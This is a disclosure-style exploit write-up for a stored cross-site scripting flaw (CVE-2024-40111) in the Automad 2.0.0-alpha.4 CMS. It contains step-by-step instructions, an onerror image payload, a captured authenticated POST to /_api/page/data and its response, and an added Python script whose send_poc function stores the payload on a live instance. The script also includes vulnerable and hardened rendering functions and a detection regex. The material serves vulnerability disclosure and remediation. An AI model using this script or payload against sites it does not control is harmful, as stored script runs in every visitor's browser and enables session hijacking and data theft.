w3bn00b3r/Stored-Cross-Site-Scripting-XSS---Automad-2.0.0-alpha.4

Exploit Title: Stored Cross-Site Scripting (XSS) - Automad 2.0.0-alpha.4

Date: 20-06-2024

CVE: CVE-2024-40111

EDB-ID: 52056

Exploit Author: Jerry Thomas (w3bn00b3r)

Vendor Homepage: https://automad.org

Category: Web Application [Flat File CMS]

Version: 2.0.0-alpha.4

Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye)

Description

A persistent (stored) cross-site scripting (XSS) vulnerability exists in Automad 2.0.0-alpha.4. An authenticated dashboard user (the PoC below uses the admin account) can inject JavaScript into a page's content blocks through the editor. The payload is saved to the flat-file store via the /_api/page/data endpoint and is executed in the browser of every visitor who opens the affected public page (the homepage in the PoC), with no further interaction. Note that the editor submits the typed markup HTML-entity-encoded (&lt;img ... &gt; in the captured request), yet the front end still renders it as live markup. This can lead to session hijacking, data theft and other actions performed in the context of the victim's browser.

Proof-of-Concept

Step-1: Log in as admin and navigate to http://localhost/dashboard/home

Step-2: The default Welcome page is listed there, with an option to edit it.

Step-3: Open the Content tab (http://localhost/dashboard/page?url=%2F&section=text) and edit the block named Main.

Step-4: Enter the XSS payload <img src=x onerror=alert(1)> into the paragraph and save. The editor stores it entity-encoded; the request below is what the browser sends.

Request:

POST /_api/page/data HTTP/1.1
Host: localhost
Content-Length: 1822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
Accept: */*
Origin: http://localhost
Referer: http://localhost/dashboard/page?url=%2F&section=text
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
Connection: close

------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__csrf__"

49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__json__"

{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"&lt;h1&gt;XSS identified by Jerry&lt;/h1&gt;","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br>&lt;img src=x onerror=alert(1)&gt;<br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
------WebKitFormBoundaryzHmXQBdtZsTYQYCv--

Response:

HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 20 Jun 2024 19:17:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/8.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30

{"code":200,"time":1718911055}

Step-5: The XSS fires for any visitor who opens the homepage - http://localhost/
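The procedure above, as an added example that is not part of the PoC repository or of Automad itself. It rebuilds the multipart POST to /_api/page/data from the captured request (same endpoint, __csrf__ and __json__ fields, and block layout), encodes the payload the way the editor does, and shows the rendering difference that makes the stored text executable. The session cookie and CSRF token are assumed to be copied from an admin browser session; the render functions model the behaviour observed in Step-5, not Automad's real code, and the block ids are randomly generated here.

```python
"""Helpers for the Automad 2.0.0-alpha.4 stored XSS (CVE-2024-40111).

Added example for this write-up; it is not code from the PoC repository or
from Automad. Endpoint, field names and block layout are taken from the
captured request above. How Automad renders the block is modelled from the
observed behaviour (Step-5) and is an assumption, not Automad's actual code.
"""
import html
import json
import re
import time
import urllib.request
import uuid

API_PATH = "/_api/page/data"                # endpoint from the captured request
PAYLOAD = "<img src=x onerror=alert(1)>"     # payload from Step-4
# Paragraph text exactly as it appears in the captured request body.
CAPTURED_TEXT = ("You have successfully installed Automad 2.<br><br>"
                 "&lt;img src=x onerror=alert(1)&gt;<br>")


def editor_encode(text: str) -> str:
    """Mimic the dashboard editor: angle brackets typed by the user are
    entity-encoded before the block is submitted (see "&lt;img ... &gt;" above)."""
    return html.escape(text, quote=False)


def build_page_json(page_url: str, payload: str, fetch_time: int) -> str:
    """Build the __json__ field: the captured document reduced to a single
    +main paragraph block carrying the payload. Block id is random here
    (assumption; the real editor generates its own)."""
    block = {
        "id": uuid.uuid4().hex,
        "type": "paragraph",
        "data": {"text": editor_encode(payload), "large": False},
        "tunes": {"layout": None,
                  "spacing": {"top": "", "right": "", "bottom": "", "left": ""},
                  "className": "", "id": ""},
    }
    doc = {
        "data": {"title": "Welcome",
                 "+main": {"blocks": [block], "automadVersion": "2.0.0-alpha.4"}},
        "theme_template": "project",
        "dataFetchTime": str(fetch_time),
        "url": page_url,
    }
    return json.dumps(doc, separators=(",", ":"))


def build_multipart(csrf: str, page_json: str, boundary: str) -> bytes:
    """Encode __csrf__ and __json__ as multipart/form-data, as the browser did."""
    body = ""
    for name, value in (("__csrf__", csrf), ("__json__", page_json)):
        body += (f"--{boundary}\r\n"
                 f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
                 f"{value}\r\n")
    return (body + f"--{boundary}--\r\n").encode()


def send_poc(base_url: str, cookie: str, csrf: str, page_url: str = "/",
             payload: str = PAYLOAD) -> dict:
    """Store the payload on a live instance. Assumes a valid admin session
    cookie ("Automad-<hash>=<id>") and its __csrf__ token copied from the
    dashboard; obtaining them is outside this example. Expect {"code":200,...}."""
    boundary = "----PoC" + uuid.uuid4().hex
    page_json = build_page_json(page_url, payload, int(time.time()))
    body = build_multipart(csrf, page_json, boundary)
    req = urllib.request.Request(base_url.rstrip("/") + API_PATH, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())


def render_vulnerable(stored_text: str) -> str:
    """Model of the affected front end: the stored text is emitted as markup,
    so the entity-encoded <img> becomes a live element (Step-5)."""
    return "<p>" + html.unescape(stored_text) + "</p>"


def render_hardened(stored_text: str) -> str:
    """Escape on output so user-typed markup is displayed, not executed.
    A production fix would use an allowlist sanitizer, since the block also
    carries editor tags such as <br>; escaping everything is the simplest safe form."""
    return "<p>" + html.escape(html.unescape(stored_text)) + "</p>"


ACTIVE_MARKUP = re.compile(r"<\w[^>]*\son\w+\s*=", re.IGNORECASE)


def contains_active_markup(rendered_html: str) -> bool:
    """Triage check for a fetched page: any tag carrying an on* event handler."""
    return ACTIVE_MARKUP.search(rendered_html) is not None


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(CAPTURED_TEXT))
    print("hardened:  ", render_hardened(CAPTURED_TEXT))
```

Run the module directly to see the two renderings of the captured paragraph text side by side; send_poc() is only for a lab instance you control, and the response it returns should match the {"code":200,...} body shown above.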

Video PoC

Link - https://drive.google.com/file/d/10BVQKYo2H1-Nx3FOGteL2xww4lbZ3xlS/view?usp=sharing
